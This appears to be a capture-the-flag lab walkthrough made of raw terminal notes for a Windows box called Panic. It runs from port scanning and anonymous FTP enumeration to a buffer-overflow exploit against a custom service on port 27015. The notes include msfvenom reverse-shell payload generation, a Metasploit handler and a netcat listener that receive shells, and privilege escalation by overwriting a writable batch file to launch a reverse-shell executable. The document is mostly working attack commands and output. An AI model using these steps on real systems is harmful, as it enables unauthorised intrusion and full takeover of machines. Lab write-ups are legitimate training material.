$ sudo nmap -sCV -p- -v -Pn --open 192.168.190.150 > Panic.txt
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          FileZilla ftpd 0.9.60 beta
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 1 ftp ftp              0 Dec 01  2020 AppData
| drwxr-xr-x 1 ftp ftp              0 Dec 01  2020 Application Data
| drwxr-xr-x 1 ftp ftp              0 Dec 01  2020 Contacts
| drwxr-xr-x 1 ftp ftp              0 Dec 01  2020 Cookies
| drwxr-xr-x 1 ftp ftp              0 Dec 01  2020 Desktop
| drwxr-xr-x 1 ftp ftp              0 Jun 21  2021 Documents
| drwxr-xr-x 1 ftp ftp              0 Dec 01  2020 Downloads
| drwxr-xr-x 1 ftp ftp              0 Dec 01  2020 Favorites
| drwxr-xr-x 1 ftp ftp              0 Dec 01  2020 Links
| drwxr-xr-x 1 ftp ftp              0 Dec 01  2020 Local Settings
| drwxr-xr-x 1 ftp ftp              0 Dec 01  2020 Music
| drwxr-xr-x 1 ftp ftp              0 Dec 01  2020 My Documents
| drwxr-xr-x 1 ftp ftp              0 Dec 01  2020 NetHood
| ---------- 1 ftp ftp         786432 Jun 22  2021 NTUSER.DAT
| ---------- 1 ftp ftp         409600 Dec 01  2020 ntuser.dat.LOG1
| ---------- 1 ftp ftp         176128 Dec 01  2020 ntuser.dat.LOG2
| ---------- 1 ftp ftp          65536 Dec 01  2020 NTUSER.DAT{ead35664-3356-11eb-b87c-e1e29d69919f}.TM.blf
| ---------- 1 ftp ftp         524288 Dec 01  2020 NTUSER.DAT{ead35664-3356-11eb-b87c-e1e29d69919f}.TMContainer00000000000000000001.regtrans-ms
| ---------- 1 ftp ftp         524288 Dec 01  2020 NTUSER.DAT{ead35664-3356-11eb-b87c-e1e29d69919f}.TMContainer00000000000000000002.regtrans-ms
| ---------- 1 ftp ftp             20 Dec 01  2020 ntuser.ini
| drwxr-xr-x 1 ftp ftp              0 Dec 01  2020 Pictures
| drwxr-xr-x 1 ftp ftp              0 Dec 01  2020 PrintHood
| drwxr-xr-x 1 ftp ftp              0 Dec 01  2020 Recent
| drwxr-xr-x 1 ftp ftp              0 Dec 01  2020 Saved Games
| drwxr-xr-x 1 ftp ftp              0 Dec 01  2020 Searches
| drwxr-xr-x 1 ftp ftp              0 Dec 01  2020 SendTo
| drwxr-xr-x 1 ftp ftp              0 Dec 01  2020 Start Menu
| drwxr-xr-x 1 ftp ftp              0 Dec 01  2020 Templates
|_drwxr-xr-x 1 ftp ftp              0 Dec 01  2020 Videos
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
27015/tcp open  unknown
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     Huh?
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Epic/1.0
|     Content-Length: 67
|     Content-Type: text/html; charset=utf-8
|_    <html><body>Epic HTTP Server :: 1.0 :: Invulnerable</body></html>
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-07-08T05:44:44
|_  start_date: 2024-08-02T03:32:11
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)


$ curl -X POST http://192.168.190.150:27015
<html><body>Epic HTTP Server :: Please make sure that the post request is not bigger than 512 bytes</body></html>

ftp> ls Documents
-r--r--r-- 1 ftp ftp           1930 Dec 01  2020 EMET GUI.lnk
-r-xr-xr-x 1 ftp ftp          46636 Dec 01  2020 panic.exe

Learn EMET BOF exploit
$ msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp LHOST=192.168.45.246 LPORT=443 -b "\x00\x0a\x0d" -f python --smallest 

$ python3 EMET_exploit.py 192.168.190.150

msfconsole
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.45.246
set LPORT 443
run

msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.45.246:443 
[*] Sending stage (240 bytes) to 192.168.190.150
[*] Command shell session 2 opened (192.168.45.246:443 -> 192.168.190.150:49683) at 2026-07-08 17:41:52 +0800


Shell Banner:
Microsoft Windows [Version 10.0.14393]
-----
          

C:\Users\eugene\Documents>whoami
whoami
panic\eugene

PS C:\Users\eugene\downloads> cat ping.bat
cat ping.bat
@echo off
set MyServer=Server.Local
%SystemRoot%\system32\ping.exe -n 1 %MyServer% >nul
if errorlevel 1 goto NoServer

echo %MyServer% is available.
goto :EOF

:noServer
echo %MyServer% is not available.
pause
goto :EOF

C:\Users\eugene\Downloads>icacls ping.bat
icacls ping.bat
ping.bat NT AUTHORITY\SYSTEM:(F)
         BUILTIN\Administrators:(F)
         PANIC\eugene:(F)
         
C:\Users>schtasks | FIND "ping"
schtasks | FIND "ping"
# This query doesn't return anything, but it is possible the task is running from a privileged account.

$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.246 LPORT=445 -f exe -o sh445.exe

C:\Users\eugene\Downloads>echo sh445.exe > ping.bat

$ rlwrap nc -nlvp 445
listening on [any] 445 ...
connect to [192.168.45.246] from (UNKNOWN) [192.168.190.150] 49770
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\eugene\Downloads>whoami
whoami
panic\administrator

